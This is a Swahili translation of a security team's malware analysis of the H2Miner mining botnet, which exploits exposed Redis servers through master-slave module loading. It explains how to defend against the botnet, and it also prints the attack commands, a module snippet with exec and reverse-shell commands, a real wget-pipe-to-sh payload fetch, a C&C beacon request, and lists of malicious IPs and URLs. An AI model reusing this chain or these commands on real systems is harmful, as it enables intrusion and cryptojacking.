Siku moja iliyopita, seva moja ya mradi wangu ilishambuliwa na mdudu kama huyo. Kutafuta jibu la swali "ni nini?" Nilipata makala nzuri ya timu ya Alibaba Cloud Security. Kwa kuwa sikupata makala hii kuhusu Habre, niliamua kuitafsiri hasa kwa ajili yako <3
Entry
Hivi majuzi, timu ya usalama ya Alibaba Cloud iligundua mlipuko wa ghafla wa H2Miner. Aina hii ya minyoo hasidi hutumia ukosefu wa idhini au manenosiri hafifu ya Redis kama lango la mifumo yako, baada ya hapo inasawazisha moduli yake hasidi na mtumwa kupitia ulandanishi wa bwana-slave na hatimaye kupakua moduli hii hasidi kwa mashine iliyoshambuliwa na kutekeleza hasidi. maelekezo.
Hapo awali, mashambulizi kwenye mifumo yako yalitekelezwa kwa kutumia mbinu inayohusisha kazi zilizoratibiwa au vitufe vya SSH ambavyo viliandikwa kwa mashine yako baada ya mvamizi kuingia kwenye Redis. Kwa bahati nzuri, njia hii haiwezi kutumika mara nyingi kutokana na matatizo na udhibiti wa ruhusa au kutokana na matoleo tofauti ya mfumo. Hata hivyo, njia hii ya kupakia moduli mbaya inaweza kutekeleza moja kwa moja amri za mshambuliaji au kupata ufikiaji wa shell, ambayo ni hatari kwa mfumo wako.
Kwa sababu ya idadi kubwa ya seva za Redis zilizopangishwa kwenye Mtandao (takriban milioni 1), timu ya usalama ya Alibaba Cloud, kama kikumbusho cha kirafiki, inapendekeza kwamba watumiaji wasishiriki Redis mtandaoni na kuangalia mara kwa mara nguvu ya manenosiri yao na ikiwa yameathirika. uteuzi wa haraka.
H2Mchimbaji
H2Miner ni botnet ya uchimbaji madini kwa mifumo inayotegemea Linux ambayo inaweza kuvamia mfumo wako kwa njia mbalimbali, ikiwa ni pamoja na ukosefu wa idhini ya kuathiriwa kwa uzi wa Hadoop, Docker, na Redis remote command execution (RCE). Botnet hufanya kazi kwa kupakua hati hasidi na programu hasidi ili kuchimba data yako, kupanua mashambulizi kwa mlalo, na kudumisha mawasiliano ya amri na udhibiti (C&C).
Redis RCE
Maarifa kuhusu somo hili yalishirikiwa na Pavel Toporkov katika ZeroNights 2018. Baada ya toleo la 4.0, Redis hutumia kipengele cha kupakia programu-jalizi ambacho huwapa watumiaji uwezo wa kupakia ili faili zinazokusanywa na C kwenye Redis kutekeleza amri mahususi za Redis. Chaguo hili la kukokotoa, ingawa ni muhimu, lina uwezekano wa kuathiriwa ambapo, katika hali ya bwana-slave, faili zinaweza kusawazishwa na mtumwa kupitia modi ya kusawazisha kikamilifu. Hii inaweza kutumiwa na mvamizi kuhamisha faili hasidi. Baada ya uhamishaji kukamilika, washambuliaji hupakia moduli kwenye mfano wa Redis ulioshambuliwa na kutekeleza amri yoyote.
Uchambuzi wa Minyoo ya Malware
Hivi majuzi, timu ya usalama ya Alibaba Cloud iligundua kuwa saizi ya kikundi cha wachimbaji hasidi wa H2Miner imeongezeka ghafla sana. Kulingana na uchambuzi, mchakato wa jumla wa tukio la shambulio ni kama ifuatavyo.
H2Miner hutumia RCE Redis kwa shambulio kamili. Wavamizi kwanza hushambulia seva zisizolindwa za Redis au seva zilizo na manenosiri dhaifu.
Kisha wanatumia amri config set dbfilename red2.so kubadilisha jina la faili. Baada ya hayo, washambuliaji hutekeleza amri slaveof kuweka anwani ya mwenyeji wa urudufishaji wa mtumwa mkuu.
Tukio la Redis lililoshambuliwa linapoanzisha muunganisho mkuu wa mtumwa na Redis hasidi ambayo inamilikiwa na mvamizi, mvamizi hutuma moduli iliyoambukizwa kwa kutumia amri ya kusawazisha upya ili kusawazisha faili. Kisha faili ya red2.so itapakuliwa kwa mashine iliyoshambuliwa. Wavamizi kisha hutumia ./red2.so kupakia moduli ili kupakia faili hii. Sehemu inaweza kutekeleza amri kutoka kwa mvamizi au kuanzisha muunganisho wa nyuma (mlango wa nyuma) ili kupata ufikiaji wa mashine iliyoshambuliwa.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Baada ya kutekeleza amri hasidi kama vile / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, mshambulizi ataweka upya jina la faili chelezo na kupakua moduli ya mfumo ili kusafisha athari. Hata hivyo, faili ya red2.so bado itasalia kwenye mashine iliyoshambuliwa. Watumiaji wanashauriwa kuzingatia uwepo wa faili kama hiyo ya tuhuma kwenye folda ya mfano wao wa Redis.
Mbali na kuua baadhi ya michakato hasidi ya kuiba rasilimali, mshambuliaji alifuata hati hasidi kwa kupakua na kutekeleza faili mbovu za mfumo mbovu ili . Hii inamaanisha kuwa jina la mchakato au jina la saraka iliyo na kinsing kwenye seva pangishi inaweza kuonyesha kuwa mashine hiyo imeambukizwa na virusi hivi.
Kulingana na matokeo ya uhandisi wa nyuma, programu hasidi hufanya kazi zifuatazo:
- Inapakia faili na kuzitekeleza
- Uchimbaji madini
- Kudumisha mawasiliano ya C&C na kutekeleza amri za washambulizi
Tumia masscan kwa uchanganuzi wa nje ili kupanua ushawishi wako. Kwa kuongeza, anwani ya IP ya seva ya C&C ina msimbo mgumu katika programu, na seva pangishi iliyoshambuliwa itawasiliana na seva ya mawasiliano ya C&C kwa kutumia maombi ya HTTP, ambapo maelezo ya zombie (seva iliyoathiriwa) yanatambuliwa kwenye kichwa cha HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Njia zingine za kushambulia
Anwani na viungo vinavyotumiwa na mdudu
/kinsing
β’ 142.44.191.122/t.sh
β’ 185.92.74.42/h.sh
β’ 142.44.191.122/spr.sh
β’ 142.44.191.122/spre.sh
β’ 195.3.146.118/unk.sh
s&c
β’ 45.10.88.102
β’ 91.215.169.111
β’ 139.99.50.255
β’ 46.243.253.167
β’ 195.123.220.193
Kidokezo
Kwanza, Redis haipaswi kupatikana kutoka kwenye mtandao na inapaswa kulindwa na nenosiri kali. Pia ni muhimu wateja wakague kwamba hakuna faili ya red2.so kwenye saraka ya Redis na kwamba hakuna "kinsing" katika jina la faili/mchakato kwenye seva pangishi.
Chanzo: mapenzi.com